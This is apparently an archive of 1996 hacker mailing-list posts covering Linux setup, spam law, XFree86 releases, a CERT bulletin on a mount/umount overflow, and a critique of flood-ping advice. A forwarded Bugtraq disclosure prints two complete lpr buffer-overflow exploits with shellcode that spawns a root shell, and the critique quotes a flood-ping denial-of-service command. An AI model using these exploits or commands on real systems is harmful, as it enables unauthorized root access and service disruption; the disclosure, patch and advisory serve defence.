> board, you may want to wait until January or later to buy your
> CD-ROM. You'll have a better chance of getting your card supported
> and you'll also probably get a newer kernel release so it'll save you
> that much hassle in upgrading later on.
Fri Oct 18 10:14:07 1996
From: "Carolyn P. Meinel" <>
Subject: HH: More Linux stuph!>>From tobin@mail.edm.net Thu Oct 17 17:17:23 1996
>
>
>> 1) Although you in theory can run Linux on a 286 with 4 MB RAM and two
>> floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a
>> CD-ROM, and at least 200 MB free hard disk space.
>
>Note that Linux is normally a full-fledged 32-bit operating system, and,
>hence, requires a 386 or higher processor. The 286 isn't 32-bit. However,
>there is a distribution of Linux in development (the name eludes me
>currently, might be Linux86 or something) which will run on the z80, 8088,
>8086, and 286. I don't think that there is a working, distributed version
>of this available yet, though.
>
>> 2) Know as much as possible about what type of mother board, modem, hard
>> disk, CD-ROM, and video card you have. If you have any documentation for
>> these, have them on hand to reference during installation.
>
>Especially your monitor and video card if you want to setup X.
>
>> 6) Buy a book or two or three on Linux. I didn't like any of them! But
>they
>> are better than nothing. Most books on Linux come with one or two CD-ROMs
>
>Also, the HOWTO documents, although often out of date, are of great help.
>
>> The best I have found is http://sunsite.unc.edu:/pub/Linux/. It
>
>Also try http://sunsite.unc.edu/linux. There are billions of links from
>there and it's updated relatively often. Great starting point in any case.
>
>> Tobin Fricke has also pointed out that "free copies of Linux
>CD-ROMs
>> are available the Linux Support & CD Givaway web site at
>> http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where
>
>Wow! I'm being quoted. I feel special!
>
>> How about Linux security? Yes, Linux, like every operating
>system,
>> is imperfect. Eminently hackable, if you really want to know. So if you
>want
>> to find out how to secure your Linux system, or if you should come across
>
>One thing to keep in mind is that most vulnerabilities in Linux and other
>Unix operating systems are not due to inherent flaws in the system but
>rather due to misconfigurations on the part of the system adminstrator.
>However, it is true that there are a few flaws in Linux itself.
>Fortunately, shortly after any flaw is made public, a patch invariably
>shows up. (-:
>
>On a side note, if anyone has a Windows machine and a Linux machine on an
>ethernet, there is a program called SAMBA and a filesystem called ksmbfs
>that will allow your windows computer to mount shares on the linux machine,
>and vice-versa, respectively.
>
>TobinSun Oct 27 20:18:47 1996
From: Carolyn Meinel <>
Subject: HH: Linux & BSD's lpr exploit (fwd)
:Here's another reason to run Linux.
---------- Forwarded message ----------
Date: Fri, 25 Oct 1996 16:35:57 +0300
From: Vadim Kolontsov <vadim@tversu.ac.ru>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: Linux & BSD's lpr exploitHello,
there is a bug in berkeley-derived lpr, which allows attacker to get
root access (see freebsd-security for details). Here is exploit for Linux
(tested on 2.0.20), for BSD (tested on FreeBSD 2.1) and a patch.Best regards, Vadim.
-------------------------------------- linux_lpr_exploit.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------------------------- bsd_lpr_exploit.c ------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------Here is a little patch -- see file lpr.c, function card():
("!!" marks added lines)--------------------------------------------------------------------------
static void card(c, p2)
register int c;
register char *p2;
{
char buf[BUFSIZ];
register char *p1 = buf;
register int len = 2;
if (strlen(p2) > BUFSIZ-2) /* !! */
{ /* !! */
printf("No, thanks...\n"); /* !! */
exit(1); /* !! */
}
*p1++ = c;
while ((c = *p2++) != '\0') {
*p1++ = (c == '\n') ? ' ' : c;
len++;
}
*p1++ = '\n';
write(tfd, buf, len);
}With best regards, Vadim.
--------------------------------------------------------------------------
Vadim Kolontsov SysAdm/Programmer
Tver Regional Center of New Information Technologies Networks Lab
Sun Oct 27 20:18:50 1996
From: Carolyn Meinel <>
Subject: HH: Re: Linux & BSD's lpr exploit (fwd)
Carolyn Meinel
M/B Research -- The Technology Brokers---------- Forwarded message ----------
Date: Fri, 25 Oct 1996 10:45:19 -0600
From: Theo de Raadt <deraadt@cvs.openbsd.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: Re: Linux & BSD's lpr exploit> there is a bug in berkeley-derived lpr, which allows attacker to get
>root access (see freebsd-security for details). Here is exploit for Linux
>(tested on 2.0.20), for BSD (tested on FreeBSD 2.1) and a patch.OpenBSD is not vulnerable. This was found and fixed in mid-August.
Tue Oct 29 07:41:59 1996
From: Carolyn Meinel <>
Subject: HH: How to sue email spammers
Date: Mon, 28 Oct 1996 04:09:48 -0800
From: Greg Bulmash <gbhp@worldnet.att.net>Under federal law, unsolicited electronic communications such as
faxes or e-mail are illegal. Not just after someone has said not to
send them anymore, but the first time. Each one carries a minimum
penalty of $500 and a maximum penalty of $1500.I quote to you from the code section regarding this matter...
[CITE: 47USC227]
TITLE 47--TELEGRAPHS, TELEPHONES, AND RADIOTELEGRAPHS
CHAPTER 5--WIRE OR RADIO COMMUNICATION
SUBCHAPTER II--COMMON CARRIERS
Sec. 227. Restrictions on use of telephone equipment(a) Definitions
As used in this section-- * * *(2) The term ``telephone facsimile machine'' means equipment which has
the capacity (A) to transcribe text or images, or both, from paper into
an electronic signal and to transmit that signal over a regular
telephone line, or (B) to transcribe text or images (or both) from an
electronic signal received over a regular telephone line onto paper. *
* * (4) The term ``unsolicited advertisement'' means any material
advertising the commercial availability or quality of any property,
goods, or services which is transmitted to any person without that
person's prior express invitation or permission. (b) Restrictions on use
of automated telephone equipment (1) Prohibitions It shall be unlawful
for any person within the United States -- to use any telephone
facsimile machine, computer, or other device to send an unsolicited
advertisement to a telephone facsimile machine; * * * (c) to use any
telephone facsimile machine, computer, or other device to send an
unsolicited advertisement to a telephone facsimile machine; * * * (3)
Private right of action A person or entity may, if otherwise permitted
by the laws or rules of court of a State, bring in an appropriate court
of that State-- (A) an action based on a violation of this subsection or
the regulations prescribed under this subsection to enjoin such
violation, (B) an action to recover for actual monetary loss from such
a violation, or to receive $500 in damages for each such violation,
whichever is greater, or (C) both such actions. If the court finds that
the defendant willfully or knowingly violated this subsection or the
regulations prescribed under this subsection, the court may, in its
discretion, increase the amount of the award to an amount equal to not
more than 3 times the amount available under subparagraph (B) of this
paragraph. * * * (e) Effect on State law (1) State law not preempted
Except for the standards prescribed under subsection (d) of this
section and subject to paragraph (2) of this subsection, nothing in
this section or in the regulations prescribed under this section shall
preempt any State law that imposes more restrictive intrastate
requirements or regulations on, or which prohibits-- (A) the use of
telephone facsimile machines or other electronic devices to send
unsolicited advertisements; * * *
[ Amended 1992: Subsec. (b)(2)(C). Pub. L. 102-556 added subpar. (C). ]
Tue Oct 29 10:05:48 1996
Subject: HH: More Linux...>From sindekated@sincom.com Sun Oct 27 12:53:18 1996
Okay,
I knew it was full distribution, but I had no idea that it had an
expiration date. Bum deal! Greg is right - the patch would be better to
wait for, because then you can install the base Linux system, and learn a
little about it (and you can learn a *lot* in two month's time if you are
up to it) in the meantime.Thanks for the info on the expiration, Greg! I'll be passing that on to a
few people who don't know that already. :)Sin
----------
Sanity is madness put to good use...
>
> On 23 Oct 96 at 13:30, a little bird told me:
>
> > >From sindekated@sincom.com Mon Oct 21 02:31:30 1996
> >
> > For those of you who have the Trident 9440 video, it is now
> > supported with a beta release:
> >
> > XFree86 3.1.2G (beta)
>
> Yeah, but according to the docs at the xfree86.org web site, this is
> a full distribution, not a patch, and it has an expiration date.
> Since they are promising a non-beta release within the next two
> months ("before the end of the year"), it may be worthwhile for some
> people to wait instead of having to re-install Xfree within that same
> time frame.
>
> -Greg
> -----------------------------------------------------
> |"If you can find a better deal, I'll eat my foot" |
> | - Earl "Stumpy" Johnson's famous last words |
> -----------------------------------------------------
> |Greg Bulmash gbhp@worldnet.att.net|
> | Writing, Editing, DTP, Web Design & Sympathy |
> -----------------------------------------------------
> | Check Out My Humor Zine |
> | http://www.bulmash.com |
> -----------------------------------------------------Wed Oct 30 10:10:44 1996
From: Carolyn Meinel <>
Subject: HH: Linux Security FAQ Update (fwd)For those of you new to the Happy Hacker list, we send out lots of
Linux-related information because Linux is the favorite operating system
of truly elite hackers.---------- Forwarded message ----------
Date: Tue, 29 Oct 1996 17:18:46 -0500
From: CERT Bulletin <cert-advisory@cert.org>
To: cert-advisory@cert.org
Subject: CERT Vendor-Initiated Bulletin VB-96.17 - Linux Security FAQ Update-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
CERT(sm) Vendor-Initiated Bulletin VB-96.17
October 29, 1996Topic: Linux Security FAQ Update
Source: Alexander O. YurievTo aid in the wide distribution of essential security information, the CERT
Coordination Center is forwarding the following information from Alexander
Yuriev. He urges you to act on this information as soon as possible. His
contact information is included in the forwarded text below; please contact
him if you have any questions or need further information.
=======================FORWARDED TEXT STARTS HERE============================
- -----BEGIN PGP SIGNED MESSAGE-----
$Id: mount-umount,v 1.5 1996/10/24 21:17:29 alex Exp $
Linux Security FAQ Update
mount/umount Vulnerability v1.5
Thu Oct 24 17:15:10 EDT 1996
© (C) 1995,1996 Alexander O. Yuriev (alex@bach.cis.temple.edu)
CIS Laboratories
TEMPLE UNIVERSITY
U.S.A.=============================================================================
This is an official Update of the Linux Security FAQ, and it is supposed to
be signed by one of the following PGP keys:
pub 1024/9ED505C5 1995/12/06 Jeffrey A. Uphoff <juphoff@nrao.edu>
Jeffrey A. Uphoff <jeff.uphoff@linux.org>
1024/EFE347AD 1995/02/17 Olaf Kirch <okir@monad.swb.de>
1024/ADF3EE95 1995/06/08 Linux Security FAQ Primary Key <Alexander O. Yuriev>Unless you are able to verify at least one of signatures, please be very
careful when following instructions.Linux Security WWW: http://bach.cis.temple.edu/linux/linux-security
linux-security & linux-alert mailing list archives:
ftp://linux.nrao.edu/pub/linux/security/list-archive=============================================================================
LOG ( This section is maintained by Revision Control System )
$Log: mount-umount,v $
Revision 1.5 1996/10/24 21:17:29 alex
Tarsier's URL fixedRevision 1.4 1996/10/24 00:32:42 alex
Red Hat URLs updated per CERT's request
ABSTRACT
This update fixes several URLs of the Linux Security FAQ Update#13
"mount/umount vulnerability" dated Tue Sep Wed Oct 23 20:09:59 EDT
1996. There are no major updates to the text of the document.
A vulnerability exists in the mount/umount programs of the
util-linux 2.5 package. If installed suid-to-root, these programs
allow local users to gain super-user privileges.RISK ASSESSMENT
Local users can gain root privileges. The exploits that exercise
this vulnerability were made available.VULNERABILITY ANALYSIS
mount/umount utilities from the util-linux 2.5 suffer from the
buffer overrun problem. Installing mount/umount as suid-to-root
programs is necessary to allow local users to mount and unmount
removable media without having super-user privileges. If this
feature is not required, it is recommended that suid bit is removed
from both mount and umount programs. If this feature is required,
one might want to consider the other ways of implementing it. Such
approaches include but are not limited to using auto-mounter or sudo
mechanism.DISTRIBUTION FIXES
Red Hat Commercial Linux
RedHat 2.1, RedHat 3.0.3 (Picasso) and RedHat 3.0.4
(Rembrandt) contain vulnerable umount utilities.Red Hat Software advises users of Red Hat 2.1 to
upgrade to Red Hat 3.0.3 (Picasso)The replacement RPMs are available from the
following URLs:Red Hat Linux 3.0.3 (Picasso) i386 architecture
ftp://ftp.redhat.com/pub/redhat/old-releases/redhat-3.0.3/i386/updates/RPMS/util-linux-2.5-11fix.i386.rpm
ftp://ftp.redhat.com/pub/redhat/old-releases/redhat-3.0.3/i386/updates/RPMS/mount-2.5k-1.i386.rpmftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/util-linux-2.5-11fix.i386.rpm
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-1.i386.rpmftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/RedHat/util-linux-2.5-11fix.i386.rpm
ftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-1.i386.rpmRedHat Linux 3.0.3 (Picasso) Alpha architecture
ftp://ftp.redhat.com/pub/redhat/old-releases/redhat-3.0.3/axp/updates/RPMS/util-linux-2.5-11fix.axp.rpm
ftp://ftp.redhat.com/pub/redhat/old-releases/redhat-3.0.3/axp/updates/RPMS/mount-2.5k-1.axp.rpmftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/util-linux-2.5-11fix.axp.rpm
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-1.axp.rpmftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/RedHat/util-linux-2.5-11fix.axp.rpm
ftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-1.axp.rpmRedHat Linux 3.0.4 Beta (Rembrandt) i386 architecture
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-2.i386.rpm
ftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-2.i386.rpmRedHat Linux 3.0.4 Beta (Rembrandt) SPARC architecture
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-2.sparc.rpm
ftp://tarsier.cv.nrao.edu/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/mount-2.5k-2.sparc.rpmPlease verify the MD5 fingerprint of the RPMs
prior to installing them.ad9b0628b6af9957d7b5eb720bbe632b mount-2.5k-1.axp.rpm
12cb19ec4b3060f8d1cedff77bda7c05 util-linux-2.5-11fix.axp.rpm26506a3c0066b8954d80deff152e0229 mount-2.5k-1.i386.rpm
f48c6bf901dd5d2c476657d6b75b12a5 util-linux-2.5-11fix.i386.rpm7337f8796318f3b13f2dccb4a8f10b1a mount-2.5k-2.i386.rpm
e68ff642a7536f3be4da83eedc14dd76 mount-2.5k-2.sparc.rpmThe Red Hat Software Inc notes that the only
difference between mount-2.5k-1 and mount-2.5k-2 is
in the packaging format.Please note that due to the release of Red Hat 4.0,
the FTP site of Red Hat Software removed fixes for
a beta release of Rembrandt.Caldera Network Desktop
Caldera Network Desktop version 1.0 contains
vulnerable mount and umount programs.Caldera Inc issued Caldera Security Advisory 96.04
where it recommends removing setuid bit from
mount and umount commands using commandchmod 755 /bin/mount /bin/umount.
Users of Caldera Network Desktop 1.0 upgraded to
RedHat 3.0.3 (Picasso) are advised to follow the
instructions in the Red Hat Commercial Linux section
of this LSF Update.Debian
Debian/GNU Linux 1.1 contains the vulnerable
mount/umount programs. The Debian Project provided
the information that an updated package fixes this
problem.The fix-kit can be obtained from the following URLs:
ftp://ftp.debian.org/debian/stable/binary-i386/base/mount_2.5l-1.deb
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/Debian/mount_2.5l-1.deb
ftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/Debian/mount_2.5l-1.debPlease verify the MD5 signature of the RPM prior
to installing the fix-kit6672530030f9a6c42451ace74c7510ca mount_2.5l-1.deb
WARNING: The message that contained information
about MD5 hash of the mount_2.5l-1.deb package was
not signed. We were unable to verify the integrity
of the message.Slackware
There is no official information available about
vulnerability of Slackware 3.0 or Slackware 3.1
distributions from distribution maintainer.The testing indicates that both Slackware 3.0 and
Slackware 3.1 distributions contains the vulnerable
mount and umount programs.Until the official fix-kit for Slackware 3.0 and 3.1
becomes available system administrators are advised
to follow the instructions in the Other Linux
Distributions section of this LSF UpdateYggdrasil
Yggdrasil Computing Inc neither confirmed not denied
vulnerability of Plug and Play Fall'95 Linux.The testing indicates that Plug and Play Fall'95
Linux distribution contains the vulnerable mount
and umount program.Until the official fix-kit for Yggdrasil Plug and
Play Linux becomes available system administrators
are advised to follow the instructions in the Other
Linux Distributions section of this LSF UpdateOther Linux Distributions
It is believed at this moment that all Linux
distributions using util-linux version 2.5 or prior
to that contain the vulnerable mount and umount
programs.Administrators of systems based on distributions
not listed in this LSF Update or distributions that
do not have fix-kits available at the moment are
urged to contact their support centers requesting
the fix-kits to be made available to them.In order to prevent the vulnerability from being
exploited in the mean time, it is recommended that
the suid bit is removed from mount and umount
programs using commandchmod u-s /bin/mount /bin/umount
Until the official fix-kits are available for those
systems, it is advised that system administrators
obtain the source code of fixed mount program used
in Debian/GNU Linux 1.1, compile it and replace the
vulnerable binaries.The URLs for the source code of the Debian/GNU Linux
1.1 package which fixes the security problem of
mount utility can be obtained from the following
URLs:ftp://ftp.debian.org/debian/stable/source/base/mount_2.5l-1.tar.gz
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/OTHER/mount_2.5l-1.tar.gz
ftp://tarsier.cv.nrao.edu/pub/linux/security/DISTRIBUTION-FIXES/OTHER/mount_2.5l-1.tar.gzWarning: We did not receive MD5 hash of the
mount_2.5l-1.tar.gz file.CREDITS
This LSF Update is based on the information originally posted to
linux-alert. The information on the fix-kit for Red Hat commercial
Linux was provided by Elliot Lee (sopwith@redhat.com) of Red Hat
Software Inc,; for the Caldera Network Desktop by Ron Holt of
Caldera Inc.; for Debian/GNU Linux 1.1 by Guy Maor
(maor@ece.utexas.edu)- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2iQCVAwUBMm/dIIxFUz2t8+6VAQFAawP+PmYCYpOcX+bnG9Sh37Iq0mWHlPDaOzjB
dPAr6kcAuP60jHd9jIwYKiTiGsWrr5h7L8G8+CrD8BjHBF2RCwII9q/KlWukk96v
3Mb0eJUoxf4xqDYXPqcsl54/xe8s3q0+JcKvQf2UKvHhEYshp+Z6oY2Eg3I7w85m
oPLjd/SidQE=
=CrbU
- -----END PGP SIGNATURE-----
========================FORWARDED TEXT ENDS HERE=============================
If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (FIRST).We strongly urge you to encrypt any sensitive information you send by email.
The CERT Coordination Center can support a shared DES key and PGP. Contact
the CERT staff for more information.Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
CERT Contact Information
- ------------------------
Email cert@cert.orgPhone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USACERT publications, information about FIRST representatives, and other
security-related information are available from
http://www.cert.org/
ftp://info.cert.org/pub/CERT advisories and bulletins are also posted on the USENET newsgroup
comp.security.announceTo be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT is a service mark of Carnegie Mellon University.
This file: ftp://info.cert.org/pub/cert_bulletins/VB-96.17.linux
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2iQCVAwUBMnZrHHVP+x0t4w7BAQGnFAP+OoWtOA9jBGQEeM8uVqrsBvckhUzIiZpb
hrz361KqeRdSNgqUg3UJLqIqJ+km3bdFPoB6zcelM8IU0xwc4tkUW9mCq+PVFcVR
tchJa5OR5Uvy9ZEQO00thFBO+2/OP220ld+iaDoT37Jl5qUnqncD0dxWqKoq/CC4
tZHLvfSefo4=
=d/UU
-----END PGP SIGNATURE-----Thu Oct 31 17:16:38 1996
From: Carolyn Meinel <>
Subject: HH: Re: Extreme Humor. (fwd)Date: Wed, 30 Oct 1996 15:32:16 -0700
From: Damien Sorder <jericho@dimensional.com>
> GUIDE TO (mostly) HARMLESS HACKING
> very simple. In fact, it is so simple that if you use Windows 95, by the
> time you finish this article you will know a simple, one-line command that
> you could use to crash many Internet hosts and routers.Question: Why even make the pretense that this is 'mostly harmless'? This
is a DOS attack, pure and simple.> /usr/etc/ping hostname
>
> If this doesn't work, complain to your ISP's tech support.Gee. Linux likes to put it in /bin/ping (for newer distributions at
least). Urging people to complain because they can't find a util seems
pointless. How about telling them "whereis" or the more useful "find"
command?> The flood ping is a simple example. If your operating system will let you
> get away with giving the command:
>
> -> ping -f hostnameIs this another "harmless" hack?
> The easiest way to do this hack is to run Windows 95. Don't have it? You can
> generally find a El Cheapo store that will sell it to you for $99.How in the hell can you justify recommending this under any
circumstances?! I think that is just about the farthest from 'hacking'
that one can get.
I understand what you are doing, and why.. but I'd like to point out the
hypocrisy of it. It is more than obvious you don't want to get busted or
harassed because of this, but please don't make pretenses about "harmless"
hacking and post stuff like this. There is nothing wrong or illegal with
saying "this will harm a system". Hell, you said as much already.. don't
contradict yourself with this other babble of it being 'alright' or
whatever.-damien
Thu Oct 31 17:16:40 1996
From: Carolyn Meinel <>
Subject: HH: Xfree86 3.2 is now available... (fwd)
From: Greg Bulmash <gbhp@worldnet.att.net>
If you drop by the Xfree86 web site...
http://www.xfree86.org
You can find out more about how to get the latest release. Presently
the mirrors don't seem to have it yet and, of course, you need to be
lucky to not catch the xfree86.org FTP server already maxed out. But
if you have been waiting like I have, getting online sometime tonight
and making the effort to get it might just be worth your while.-Greg
-----------------------------------------------------
|"If you can find a better deal, I'll eat my foot" |
| - Earl "Stumpy" Johnson's famous last words |
-----------------------------------------------------
|Greg Bulmash gbhp@worldnet.att.net|
| Writing, Editing, DTP, Web Design & Sympathy |
-----------------------------------------------------
| Check Out My Humor Zine |
| http://www.bulmash.com |
-----------------------------------------------------Thu Oct 31 17:16:53 1996
From: Greg Bulmash <gbhp@worldnet.att.net>
Subject: More on Xfree86 3.2If anyone is trying to d-load it and they're finding that they can't
get into ftp.xfree86.org, they may find that a number of the mirrors
either don't have it or haven't made it available yet. After a lot of
searching, I found one that did...ftp://despair.capecod.net/pub/XFree86/3.2/binaries/Linux
It is a full release, so expect to spend around an hour downloading
all the components at 28.8.-Greg
-----------------------------------------------------
|"If you can find a better deal, I'll eat my foot" |
| - Earl "Stumpy" Johnson's famous last words |
-----------------------------------------------------
|Greg Bulmash gbhp@worldnet.att.net|
| Writing, Editing, DTP, Web Design & Sympathy |
-----------------------------------------------------
| Check Out My Humor Zine &n